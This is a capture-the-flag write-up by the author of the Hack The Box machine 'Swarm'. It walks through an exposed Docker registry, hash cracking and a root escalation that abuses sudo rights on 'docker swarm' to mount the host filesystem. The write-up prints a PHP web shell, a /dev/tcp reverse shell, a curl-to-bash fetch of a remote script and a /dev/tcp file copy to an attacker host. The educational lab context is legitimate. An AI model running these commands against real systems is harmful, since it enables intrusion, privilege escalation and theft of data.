HTB Business CTF - Swarm Writeup

15 min read May 21, 2024 3173 words
Writeup for my 2024 HTB Business CTF FullPwn Box Swarm.

This is a writeup for my 2024 Hack The Box Business CTF FullPwn Machine, Swarm. While I was not initially planning on creating a dedicated writeup for the machine, it was brought to my attention that many players regarded the privilege escalation as ungodly. As such, I felt a responsibility to provide the traumatised players with a thorough explanation for my creation.

confession

Enumeration

As always, we start off with an nmap scan to test the waters.

ports=$(nmap -p- --min-rate=1000 -T4 10.129.230.94 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.230.94

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 17:21 BST
Nmap scan report for swarm.htb (10.129.230.94)
Host is up (0.016s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp   open  http       nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Home - Simple News Portal
5000/tcp open  http       Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
7946/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 92.82 seconds

We see that SSH is at our disposal, as well as an NGINX web server and a Docker registry on port 5000.

Port 80

Browsing to the website on port 80, we get redirected to swarm.htb, which we add to our hosts file:

echo 10.129.230.94	swarm.htb | sudo tee -a /etc/hosts

We land on a news page hosting several articles related to events from the CTF lore. The site has a Login mechanism but no means to register an account.

web application

We run a directory scan to look for potentially interesting endpoints.

gobuster dir -u http://swarm.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -q

/login                (Status: 200) [Size: 5673]
/profile              (Status: 302) [Size: 0] [--> /login?next=/profile]
/admin                (Status: 301) [Size: 0] [--> /admin/]
/posts                (Status: 302) [Size: 0] [--> /login?next=/posts]
/logout               (Status: 302) [Size: 0] [--> /]

Browsing to /admin reveals that we are dealing with a Django backend.

Django admin

At this point, we have hit a wall, as there’s no more functionality to investigate on the web application, and we lack any credentials for the admin panel. We therefore move on to the exposed Docker registry.

Foothold

We can use the registry API to query for images hosted on the service, as long as it is not password-protected.

curl http://swarm.htb:5000/v2/_catalog

{"repositories":["newsbox-web"]}

curl http://swarm.htb:5000/v2/newsbox-web/tags/list

{"name":"newsbox-web","tags":["latest"]}

We see an image (repository) named newsbox-web:latest, which matches the name of the web application we checked out earlier. We proceed to pull the image to create a container locally, so that we can take a look at the backend.

docker pull 10.129.230.94:5000/newsbox-web:latest    

Error response from daemon: Get "https://10.129.230.94:5000/v2/": http: server gave HTTP response to HTTPS client

We get an error, as the Docker client defaults to using HTTPS for registry communication, which fails here as the registry is not set up for HTTPS. To fix this, we need to add the server to our insecure-registries, allowing Docker to “trust” it without validating it via SSL.

Note: An alternative approach that might be preferable for some players could be to use a tool such as DockerRegistryGrabber, which can pull images and re-create the filesystems locally, without creating a Docker container. This is particularly useful for users on different architectures to the target machine, which would otherwise struggle to create a local container using the image.

echo '{ "insecure-registries":["10.129.230.94:5000"] }' | sudo tee -a /etc/docker/daemon.json

{ "insecure-registries":["10.129.230.94:5000"] }

We then have to restart the docker service for our changes to take effect, after which we retry pulling the image.

sudo systemctl restart docker
docker pull 10.129.230.94:5000/newsbox-web:latest    

latest: Pulling from newsbox-web
b0a0cf830b12: Pull complete 
72914424168c: Pull complete 
545ebfaa7506: Pull complete 
80ee918b2084: Pull complete 
d361726ad66f: Pull complete 
4d2c6c1a8e80: Pull complete 
df4459b8a74f: Pull complete 
26484ab3509b: Pull complete 
Digest: sha256:26e727643185bfcf51da5fe8003f76d3b43ee1e51762fb44f0fae1c01679baed
Status: Downloaded newer image for 10.129.230.94:5000/newsbox-web:latest
10.129.230.94:5000/newsbox-web:latest

Now, we can create a container with the image.

# Verify we have the image
docker image ls -a                               

REPOSITORY                       TAG       IMAGE ID       CREATED        SIZE
10.129.230.94:5000/newsbox-web   latest    10411032f71d   25 hours ago   198MB

# Create the container using the Image ID
docker container create 10411032f71d

# Verify the creation
docker ps  -a
CONTAINER ID   IMAGE          COMMAND       CREATED          STATUS    NAMES
0efa04a66079   10411032f71d   "python..."   23 seconds ago   Created   peaceful_ganguly

# Start container using the name
docker start peaceful_ganguly

Finally, we can hop into a shell inside the container.

docker exec -it peaceful_ganguly bash

We find ourselves in the /app directory, which matches our expectation of a Django application.

root@0efa04a66079:/app# ls -al

total 300
drwxr-xr-x  1 root root   4096 Apr 25 13:09 .
drwxr-xr-x  1 root root   4096 Apr 26 15:36 ..
-rw-r--r--  1 root root    180 Apr 25 13:08 Dockerfile
-rw-r--r--  1 root root 253952 Apr 25 12:59 db.sqlite3
drwxr-xr-x  1 root root   4096 Apr 25 14:46 django_news
-rw-r--r--  1 root root    689 Apr  6  2022 manage.py
drwxr-xr-x  4 root root   4096 Apr 24 16:57 media
drwxr-xr-x  1 root root   4096 Apr 25 12:05 newsApp
-rw-r--r--  1 root root     32 Apr 25 13:08 requirements.txt
drwxr-xr-x 11 root root   4096 Apr 25 14:49 static
-rw-r--r--  1 root root   1956 Apr 25 12:16 wget-log

We see a db.sqlite3 file, which we exfiltrate and enumerate for possible password hashes.

# Locally
nc -nlvp 4444 > db.sqlite3   
listening on [any] 4444 ...
# In Docker
root@0efa04a66079:/app# cat < db.sqlite3 > /dev/tcp/10.10.14.40/4444

We get three hashes:

sqlite> select * from auth_user;

1|pbkdf2_sha256$60$9jLMaflzyx1C3dAsBqZs8m$1H64ybyNv6NWUIw+TIaYE40VIW9enXe88teW5X+cQEI=|2024-04-30 16:32:56.994788|1|admin|Administrator|admin@swarm.htb|1|1|2022-04-06 01:44:10|Melo
2|pbkdf2_sha256$60$HXF8aUc1IWkR9ajH3y8LS8$d7MFlG+lVPC03n31bt4u6OvGs7z1hJpiUYp5eGHoAZM=|2022-04-06 08:16:01|0|ChasingDeadlines|Loman|cloman@swarm.htb|0|1|2022-04-06 08:14:40|Chase
3|pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=||0|PenniesForThoughts|Lessing|plessing@swarm.htb|1|1|2024-04-25 12:07:58|Penny

We save the hashes to a file and feed them to hashcat, using mode 10000 for Django pbkdf2.

Note: The hashes’ prefix gives away that only 60 iterations were used for the hash, which of course is a non-default setting applied to make the cracking of the hashes less expensive for the sake of exploitation. PBKDF2 is generally quite secure and Django (4.2), by default, uses 600.000 iterations, a number which increases with each release.

hashcat -m 10000 hash --wordlist /usr/share/wordlists/rockyou.txt

<...SNIP....>
pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=:pennypenny99

After about thirty seconds, we obtain the password pennypenny99, for Penny Lessing’s account. We try to SSH into the machine using the credentials, with her email revealing the username to use.

ssh plessing@swarm.htb

This is where find the user.txt flag.

plessing@swarm$ cat user.txt

HTB{b3_f1r5t_b3_5m4rt3r_0r_ch34t}

Privilege Escalation

Alas, we reach the apparently traumatising part of the box, which is the privilege escalation, and also the vector that gives the box its name.

We start by checking the user’s sudo permissions.

plessing@swarm:~$ sudo -l

Matching Defaults entries for plessing on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User plessing may run the following commands on localhost:
    (root : root) /usr/bin/docker swarm *

We see that we can run the docker swarm command as root.

Swarm is a feature that allows the management and creation of a cluster of Docker daemons, distributed across systems. Swarm allows for the deplyoment of Manager and Worker nodes, with the former having the power to control and orchestrate the cluster.

These clusters work on the basis of so-called services, which are tasks that are executed on the nodes within the swarm. When creating a service, we can specify a container image and the commands that ought to be executed inside the running containers. A service can be replicated and therefore distributed to multiple nodes in the swarm, which is the key to escalating privileges in this scenario.

The path to exploit this configuration is quite intuitive: we will create a swarm that will contain both the target machine and our attacking machine, and will deploy a malicious container/service that will, by design, be deployed on the target, leading to privilege escalation.

Setting up the Swarm

We start by initialising the swarm on the target. Alternatively, we could also start a swarm on our attacking machine and join it from the target.

plessing@swarm:~$ sudo docker swarm init

Swarm initialized: current node (mt1rdeokdo2ubw7i12758f072) is now a manager.

To add a worker to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-66a7eag29hbj3hyazvw62mqvhydv62t5r6cujjkjzha806f8kw-2ylbobpjug7bbpx7g4hl07aij 10.129.230.94:2377

To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.

The swarm is initialised, and the target machine automatically joins it as a manager. We also see in the output that we are provided with a command that would allow a node to join the swarm, however, it would be doing so as a worker.

For our intents and purposes, we need a manager token, which we can generate as follows:

plessing@swarm:~$ sudo docker swarm join-token manager

To add a manager to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-4lgn49qnlg2em8i8kiow50f9x1qt0rh0ru453kbs2xcvv9b9ym-2sa3ni9uj490oioypa72nnyof 10.129.230.94:2377

We can then paste this command on our attacking machine, joining the target’s swarm as a manager.

docker swarm join --token SWMTKN-1-4lgn49qnlg2em8i8kiow50f9x1qt0rh0ru453kbs2xcvv9b9ym-2sa3ni9uj490oioypa72nnyof 10.129.230.94:2377

This node joined a swarm as a manager.

If we run docker info, we can see that the swarm is active and has two nodes; ourselves and the target machine.

docker info

<...SNIP...>
 Swarm: active
  NodeID: arn38feajj60n3ay1zzxmoj11
  Is Manager: true
  ClusterID: r3tj78x77mr29p3cvk7wzdnde
  Managers: 2
  Nodes: 2
<...SNIP...>

Having self-appointed the manager position, we can now abuse our power and impose services on the unfortunate nodes within our swarm.

There’s different approaches we could take at this stage, such as using a pre-built OpenSSH image, but for the sake of this writeup I will manually create an image hosting a PHP web shell:

mkdir pwnpod
cd pwnpod

cat > Dockerfile <<EOF
FROM php:latest
WORKDIR /var/www/html
COPY index.php .
CMD ["php", "-S", "0.0.0.0:1337"]
EOF

cat > index.php <<EOF           
<?php system(\$_GET[0])?>
EOF

docker image build . -t pwnpod:latest

After building the image, we have to push it to the target’s registry:

docker image tag pwnpod:latest 10.129.230.94:5000/pwnpod:latest
docker push 10.129.230.94:5000/pwnpod:latest

Finally, we create the service and push it to the swarm, infecting all nodes. We expose the service on port 1337, and specify a mount, namely the root filesystem /, which will be mounted on /mnt within the container.

docker service create -d -p 1337:1337 --name pwnpod --replicas 2 --mount type=bind,source=/,target=/mnt localhost:5000/pwnpod:latest  

image localhost:5000/pwnpod:latest could not be accessed on a registry to record
its digest. Each node will access localhost:5000/pwnpod:latest independently,
possibly leading to different nodes running different
versions of the image.

Two things are crucial here. Firstly, while one might be tempted to specify the remote registry explicitly, i.e. 10.129.230.94:5000, this will cause the you to pwn yourself, as the container will be defined on your system and despite being accessible via 10.129.230.94:1337, your own filesystem will be mounted, instead of the target’s. As such, we must define the registry as localhost:5000, which will fail on our system but succeed on the target system, which actually has a running registry. Secondly, note the --replicas 2. With more members in the swarm, we could either make this a global service or increase the replicas, to affect more nodes in the swarm.

We can now see the malicious containers running, but only on the target system (swarm). For us, the htb-... nodes, we get a No such image: error, as it tried to load the image from localhost:5000, which doesn’t exist on our system.

docker service ps pwnpod

ID             NAME           IMAGE                          NODE             DESIRED STATE   CURRENT STATE             ERROR                              PORTS
wavip6eyx4bp   pwnpod.1       localhost:5000/pwnpod:latest   swarm            Ready           Ready 3 seconds ago                                          
tqk01tcrenl0    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 9 seconds ago    "No such image: localhost:5000…"   
xy2nf4qodxoq    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 14 seconds ago   "No such image: localhost:5000…"   
kj8xox16lqt0    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 19 seconds ago   "No such image: localhost:5000…"   
80k8q23aofv4    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 24 seconds ago   "No such image: localhost:5000…"   
kmjrvnmid1ff   pwnpod.2       localhost:5000/pwnpod:latest   swarm            Running         Running 17 seconds ago

Checking the open ports on the target reveals that 1337 is listening, as we defined.

plessing@swarm:~$ ss -tlpn

State     Recv-Q    Send-Q       Local Address:Port        Peer Address:Port    Process
LISTEN    0         4096               0.0.0.0:5000             0.0.0.0:*
LISTEN    0         4096               0.0.0.0:80               0.0.0.0:*
LISTEN    0         128                0.0.0.0:22               0.0.0.0:*
LISTEN    0         4096                  [::]:5000                [::]:*
LISTEN    0         4096                     *:2377                   *:*
LISTEN    0         4096                     *:7946                   *:*
LISTEN    0         4096                  [::]:80                  [::]:*
LISTEN    0         128                   [::]:22                  [::]:*
LISTEN    0         4096                     *:1337                   *:*

Finally, we can use this exposed port to access our malicious PHP server and get a shell inside the container, with the target’s filesystem mounted.

curl http://swarm.htb:1337/index.php?0=id

uid=0(root) gid=0(root) groups=0(root)

Shell incoming:

nc -nlvp 4444
cat > boom.sh<<EOF
#!/bin/sh
/bin/sh -i >& /dev/tcp/10.10.14.59/4444 0>&1
EOF
python3 -m http.server 80
curl http://10.129.230.94:1337/index.php?0=curl+10.10.14.59/boom.sh\|bash
nc -nlvp 4444 

listening on [any] 4444 ...
connect to [10.10.14.59] from (UNKNOWN) [172.18.0.8] 38604
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

We got a shell as root. The host filesystem is mounted in /mnt.

# cd /mnt
# ls -al root 
total 56
drwx------  6 root root  4096 Apr 30 16:31 .
drwxr-xr-x 18 root root  4096 Apr 17 08:46 ..
lrwxrwxrwx  1 root root     9 Apr 25 14:58 .bash_history -> /dev/null
-rw-r--r--  1 root root   571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root  4096 Apr 24 16:55 .cache
drwx------  3 root root  4096 Apr 25 13:09 .docker
-rw-r--r--  1 root root   161 Jul  9  2019 .profile
drwxr-xr-x  2 root root  4096 Apr 25 11:57 .vim
-rw-------  1 root root 18003 Apr 30 16:31 .viminfo
drwxr-xr-x  4 root root  4096 Apr 25 14:44 docker
-rw-r-----  1 root root    33 Apr 25 14:58 root.txt

Alas, we obtain the dreaded final flag:

# cat root/root.txt
HTB{5tunG_bY_th3_5w4rm}

Alternative Privesc Methods

Alternative methods of exploitation include creating a swarm on our attacking machine, as opposed to initialising it on the target, and joining it from the target system as a worker. One can then also deploy malicious images, either by forwarding a local registry or using the one on the target.

The steps are similar; we first initialise a swarm on our attacking machine:

docker swarm init --advertise-addr 10.10.14.12

Swarm initialized: current node (wrcs67aevd8b91apm7gk0d0jq) is now a manager.

To add a worker to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-5s1avojblmwgma55ie1bssf9ssye0h2erbuosqppj2ihqr3779-4p7iiqqlwrg6ef76m59uxh2ov 10.10.14.12:2377

To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.

We then run the provided command on the target machine to join our swarm as a worker.

plessing@swarm:~$ sudo docker swarm join --token SWMTKN-1-5s1avojblmwgma55ie1bssf9ssye0h2erbuosqppj2ihqr3779-4p7iiqqlwrg6ef76m59uxh2ov 10.10.14.12:2377

This node joined a swarm as a worker.
docker node ls

ID                            HOSTNAME         STATUS    AVAILABILITY   MANAGER STATUS   ENGINE VERSION
wrcs67aevd8b91apm7gk0d0jq *   htb-rudmqnwpkl   Ready     Active         Leader           25.0.3
r79o0kqhcwktmljza2s2d7rto     swarm            Ready     Active                          26.1.1

I’ll also demonstrate the OpenSSH alternative here, as opposed to our PHP web shell. Once again, this would be of benefit to individuals on different architectures, who otherwise would not be able to create a local image and push it to the target.

docker pull lscr.io/linuxserver/openssh-server:amd64-latest

amd64-latest: Pulling from linuxserver/openssh-server
6c0d85d774e7: Pull complete 
1c50a76b3d41: Pull complete 
d48dba489a7d: Pull complete 
069593985fd7: Pull complete 
5dc7ed07e470: Pull complete 
e815c350f682: Pull complete 
46b882b84dc4: Pull complete 
Digest: sha256:bd738dd7a7012fe38f2f6829a8511cd980c05f1ed511390e38b14c3164518445
Status: Downloaded newer image for lscr.io/linuxserver/openssh-server:amd64-latest
lscr.io/linuxserver/openssh-server:amd64-latest

Again, we tag and push it to the target’s registry:

docker image tag lscr.io/linuxserver/openssh-server:amd64-latest swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest
docker push swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest

The push refers to repository [swarm.htb:5000/lscr.io/linuxserver/openssh-server]
3348306d1b8b: Pushed 
d296c9cd4a28: Pushed 
d58325308e45: Pushed 
98051686a067: Pushed 
cd7df000bc55: Pushed 
c2b4ff0f7a07: Pushed 
67230d759fa0: Pushed 
amd64-latest: digest: sha256:bd738dd7a7012fe38f2f6829a8511cd980c05f1ed511390e38b14c3164518445 size: 1782

Finally, we create the service, same as before. To make the attack a little more sophisticated, I will show how to precisely target a given node in the swarm.

Targeting Nodes

We can add arbitrary metadata to a node using labels, which we can then in turn use to specify constraints on where to deploy a service.

docker node update --label-add target=1 swarm 

swarm

Here, we simply add a target label to the node. This could, of course, be done much more covertly. We can see the label when inspecting the node:

docker node inspect swarm --pretty

ID:			r79o0kqhcwktmljza2s2d7rto
Labels:
 - target=1
Hostname:              	swarm
Joined at:             	2024-05-22 07:54:02.461147339 +0000 utc
Status:
 State:			Ready
 Availability:         	Active
 Address:		10.129.242.34
Platform:
 Operating System:	linux
 Architecture:		x86_64
Resources:
 CPUs:			2
 Memory:		3.793GiB
Plugins:
 Log:		awslogs, fluentd, gcplogs, gelf, journald, json-file, local, splunk, syslog
 Network:		bridge, host, ipvlan, macvlan, null, overlay
 Volume:		local
Engine Version:		26.1.1
TLS Info:
 TrustRoot:
-----BEGIN CERTIFICATE-----
MIIBazCCARCgAwIBAgIUI5xC/uLTYChqRqmzs+ON/itvgcgwCgYIKoZIzj0EAwIw
EzERMA8GA1UEAxMIc3dhcm0tY2EwHhcNMjQwNTIyMDc0ODAwWhcNNDQwNTE3MDc0
ODAwWjATMREwDwYDVQQDEwhzd2FybS1jYTBZMBMGByqGSM49AgEGCCqGSM49AwEH
A0IABDjHVwilDdZ7fa1t21gpM8Ea5JjbznBudoELzDGsvNsvQMMTT1rNNPLZuvGp
kJYS0ZI8QfTAVYjBgf8LLZpGEV6jQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB
Af8EBTADAQH/MB0GA1UdDgQWBBQNudO66JJXeWysH9sEEZSsPonYWjAKBggqhkjO
PQQDAgNJADBGAiEAnQWQDJ4mWHFfMK2gwynoW7xYyxAmolRtgVEB6Q2dG4kCIQCk
tt6QBfKr6GUZ9qF2DLw927ract6FcFQ7bL1QsrE2wg==
-----END CERTIFICATE-----

 Issuer Subject:	MBMxETAPBgNVBAMTCHN3YXJtLWNh
 Issuer Public Key:	MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEOMdXCKUN1nt9rW3bWCkzwRrkmNvOcG52gQvMMay82y9AwxNPWs008tm68amQlhLRkjxB9MBViMGB/wstmkYRXg==

Now, we create the service, targeting only nodes in possession of this target label.

docker service create --name pwnpod2 \
--mode global \
--constraint node.labels.target==1 \
--mount type=bind,source=/,target=/mnt \
-e SUDO_ACCESS=true \
-e USER_NAME=melo \
-e USER_PASSWORD=melo \
-e PASSWORD_ACCESS=true \
-p 2222:2222 \
swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest

overall progress: 1 out of 1 tasks 
r79o0kqhcwkt: running   
verify: Service converged

And to verify:

docker service ps pwnpod2

ID             NAME                                IMAGE                                                            NODE      DESIRED STATE   CURRENT STATE            ERROR     PORTS
jdq7ufwk0gbr   pwnpod2.r79o0kqhcwktmljza2s2d7rto   swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest   swarm     Running         Running 10 seconds ago

We see that the service was started on the target machine, and port 2222 is now open:

plessing@swarm:~$ ss -tlpn

State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port  Process  
LISTEN   0        4096             0.0.0.0:5000          0.0.0.0:*              
LISTEN   0        4096             0.0.0.0:80            0.0.0.0:*              
LISTEN   0        128              0.0.0.0:22            0.0.0.0:*              
LISTEN   0        4096                [::]:5000             [::]:*              
LISTEN   0        4096                   *:7946                *:*              
LISTEN   0        4096                   *:2222                *:*              
LISTEN   0        4096                [::]:80               [::]:*              
LISTEN   0        128                 [::]:22               [::]:*  

We can now ssh into the target on port 2222 as the melo user:

ssh melo@swarm.htb -p 2222

The authenticity of host '[swarm.htb]:2222 ([10.129.242.34]:2222)' can't be established.
ECDSA key fingerprint is SHA256:BU1EzGvQydNBj02VL/Rz70W3+kbAkm+CvwNt17Tllhw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[swarm.htb]:2222,[10.129.242.34]:2222' (ECDSA) to the list of known hosts.
melo@swarm.htb's password: melo
Welcome to OpenSSH Server
74de20dd9357:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

[sudo] password for melo: melo
/config # 

The filesystem is mounted in /mnt, giving us full access:

/config # cat /mnt/root/root.txt 
HTB{5tunG_bY_th3_5w4rm}

This method is much more targeted, which, depending on the situation, might be preferable.

Closing Thoughts

While building this box I found a lot of interesting vectors when it comes to Docker swarm, and I am eager to showcase a few of them in future machines. Two parts of this specific vector were very interesting to me: the first is that if you are not careful, you could pwn yourself, which is exactly what happened to me when I was initially testing my creation.

When running the service-creation command of the initial method, shown below, if I were to specify the remote registry via its external IP address or domain name, it would actually create the service on the target node but with my own root filesystem mounted in /mnt.

docker service create -d -p 1337:1337 --name pwnpod --replicas 2 --mount type=bind,source=/,target=/mnt swarm.htb:5000/pwnpod:latest

Only by specifying localhost:5000 or adding a --constraint flag to pinpoint the target machine(s), is this avoided.

Finally, I was quite surprised by the reactions I saw on the Discord server; I must say, a small part of me takes pride in having created a puzzle that stirred up such a swarm of emotions…

I hope you still found joy in beating this challenge and that the path to root was rewarding in the end!